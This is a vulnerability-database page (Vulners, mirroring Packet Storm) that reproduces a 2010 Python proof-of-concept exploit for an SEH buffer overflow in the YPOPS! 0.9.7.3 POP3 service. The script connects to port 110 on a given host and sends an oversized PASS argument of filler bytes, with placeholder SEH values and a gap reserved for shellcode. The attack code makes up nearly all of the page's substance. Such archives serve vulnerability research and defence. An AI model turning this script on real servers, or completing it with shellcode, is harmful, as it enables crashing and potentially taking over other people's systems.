Lucene search
K

YPOPS! 0.9.7.3 Buffer Overflow

🗓️ 11 Jan 2010 00:00:00Reported by BlakeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

YPOPS! 0.9.7.3 Buffer Overflow (SEH) vulnerabilit

Code
`  
  
# Exploit Title: YPOPS! version 0.9.7.3 Buffer Overflow (SEH)  
# Date: 1/10/10  
# Author: blake  
# Software Link: http://sourceforge.net/projects/yahoopops/files/Windows/0.9.7.3/ypops-win-0.9.7.3.exe/download  
# Version:0.9.7.3  
# Tested on: Windows XP SP3  
  
#!/usr/bin/python  
# All modules are SafeSEH protected in service pack 3.  
  
  
import socket, sys  
  
print "\n ========================================"  
print " YPOPS! v 0.9.7.3 Buffer Overflow (SEH)"  
print " Proof of Concept by Blake "  
print " Tested on Windows XP Pro SP 3 "  
print " ========================================\n"  
  
  
if len(sys.argv) != 2:  
print "Usage: %s <ip>\n" % sys.argv[0]  
sys.exit(0)  
  
host = sys.argv[1]  
port = 110  
  
buffer = "\x41" * 1663  
buffer += "\x42" * 4 # next seh  
buffer += "\x43" * 4 # seh handler  
buffer += "\x44" * 2000 # 136 bytes of space for shellcode  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect = s.connect((host,port))  
print "[+] Connecting to server...\n"  
s.recv(1024)  
s.send('USER blake\r\n')  
s.recv(1024)  
print "[+] Sending buffer\n"  
s.send('PASS ' + buffer + '\r\n')  
s.recv(1024)  
s.close()  
print "[+] Done.\n"  
except:  
print "[-] Could not connect to server!\n"  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jan 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
14